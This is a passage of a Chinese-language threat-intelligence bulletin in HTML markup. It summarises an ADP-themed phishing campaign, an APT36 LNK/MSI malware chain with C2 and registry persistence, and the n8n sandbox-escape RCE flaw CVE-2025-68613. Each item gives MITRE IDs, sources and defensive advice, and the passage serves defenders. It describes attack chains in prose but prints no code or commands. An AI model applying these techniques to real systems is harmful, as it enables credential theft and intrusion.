leaf="">输入捕获（T1056）、有效账户（T1078）、恶意文件（T1204.002）、钓鱼（T1566）、鱼叉式钓鱼链接（T1566.002）、通过 Web 服务进行数据窃取（T1567）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jfbe912l2" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/from-email-to-exfiltration-how-threat-actors-steal-adp-login-and-personal-data/" target="_blank">https://www.hendryadrian.com/from-email-to-exfiltration-how-threat-actors-steal-adp-login-and-personal-data/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9u5k" style="font-size: 14px;">此次针对ADP品牌的网络钓鱼攻击活动，攻击者发送伪装成官方通知的电子邮件，使用逼真的官方显示名称及具紧迫感的主题，声称用户违反条款需立即处理，诱导点击恶意链接。该链接指向与真实官网高度相似的虚假登录页面，先要求输入账户凭证，再额外索要两步验证代码、个人联系方式、出生日期等信息，所有输入数据均实时传输至攻击者控制的服务器。攻击者通过精细的社会工程学设计构建逼真钓鱼场景，实现账户接管，可能进一步窃取薪资、税务及相关敏感数据，引发信息泄露、身份盗窃与财务损失风险。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9191w" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigjhckvru" style="font-size: 14px;">加强员工钓鱼邮件识别培训，部署多因素认证及邮件流量实时监控系统，定期开展网络安全演练与渗透测试，修补安全漏洞以降低攻击风险。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigs0671rar"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(0, 0, 0);line-height: 22px;text-align: left;" data-mid=""><span leaf="" mpa-font-style="md8m9c40qpa" style="font-size: 32px;" data-mpa-action-id="md8m9c51feg" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">利用MSI有效载荷投递LNK恶意软件，实现远程指令、窃系统信息与持久后门建立</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jgv1e12ce"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">从本地系统获取数据（T1005）、混淆文件或信息（T1027）、软件打包（T1027.002）、嵌入式载荷（T1027.009）、通过命令与控制通道进行数据窃取（T1041）、PowerShell（T1059.001）、DNS（T1071.004）、系统信息发现（T1082）、文件和目录发现（T1083）、账户发现（T1087）、浏览器信息发现（T1217）、数据销毁（T1485）、注册运行键 / 启动文件夹（T1547.001）、隐藏窗口（T1564.003）、鱼叉式钓鱼附件（T1566.001）、动态链接库（T1574.001）</span></span></p></li><li><p><span mpa-font-style="md8jgv1e17rl" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/apt36-lnk-based-malware-campaign-leveraging-msi-payload-delivery/" target="_blank">https://www.hendryadrian.com/apt36-lnk-based-malware-campaign-leveraging-msi-payload-delivery/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jgv1ev8f" style="font-size: 14px;">某攻击团伙通过钓鱼邮件发送伪装成咨询文件的恶意 Windows 快捷方式，诱导用户执行恶意代码，构建复杂多阶段攻击链。该快捷方式利用混淆命令调用相关程序，从指定服务器下载 MSI 安装程序，其内嵌的.NET 加载器会在目标系统部署恶意 DLL、伪装 PDF 等组件至指定目录。攻击者借助恶意 DLL 中的硬编码 C2 地址及混淆处理的 HTTP 请求路径，实现心跳检测与远程命令检索，同时通过 HTA 文件嵌入脚本，将恶意程序添加至系统注册表启动项，建立持久化机制。此外，载荷还会检测杀毒软件与反虚拟化技术，开展系统安全侦查。攻击可导致目标系统被远程控制，面临数据泄露、毁损及二次渗透风险。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jgv1e1i81" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigs05r1tnb" style="font-size: 14px;">加强邮件安全过滤与用户安全培训，实时监控 MSI 程序、注册表修改及 HTA 文件动态行为，实施白名单策略，更新安全补丁，监控异常域名访问与出站流量，阻断潜在恶意通信。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(34, 44, 255);line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px rgb(34, 44, 255);text-align: left;" data-mid=""><span leaf="">03</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8incu1uzj" style="font-size: 20px;" data-mpa-action-id="md8incuv1bwi" data-pm-slice="0 0 []">重点漏洞情报</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">n8n 远程代码执行漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-68613）</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">高危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79" target="_blank">https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79</a></span></span></span></p><p><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/n8n-io/n8n/commit/1c933358acef527ff61466e53268b41a04be1000" target="_blank">https://github.com/n8n-io/n8n/commit/1c933358acef527ff61466e53268b41a04be1000</a></span></span></p><p><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/n8n-io/n8n/commit/39a2d1d60edde89674ca96dcbb3eb076ffff6316" target="_blank">https://github.com/n8n-io/n8n/commit/39a2d1d60edde89674ca96dcbb3eb076ffff6316</a></span></span></p><p><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp" target="_blank">https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">n8n 被披露其存在远程代码执行漏洞，漏洞编号CVE-2025-68613。可导致经过身份验证的远程攻击者执行任意代码等危害。n8n 是一个功能强大、高度灵活且可扩展的开源自动化工具。它允许用户通过直观的可视化接口，将来自不同应用程序和服务的数据串联起来，建立复杂的自动化工作流程，无需编写传统程序代码。 据官方描述，在 n8n 自动化工具中，由于其工作流表达式的评估环境未能与底层 Node.js 运行时充分隔离，导致经过身份验证的远程攻击者可在特定条件下，通过配置恶意表达式突破沙箱限制，从而直接访问并操作 Node.js 全局对象或内置模块，最终在运行 n8n 进程的服务器上以该进程权限执行任意操作系统命令。 目前该漏洞的漏洞细节、POC已公开。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="9 12 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 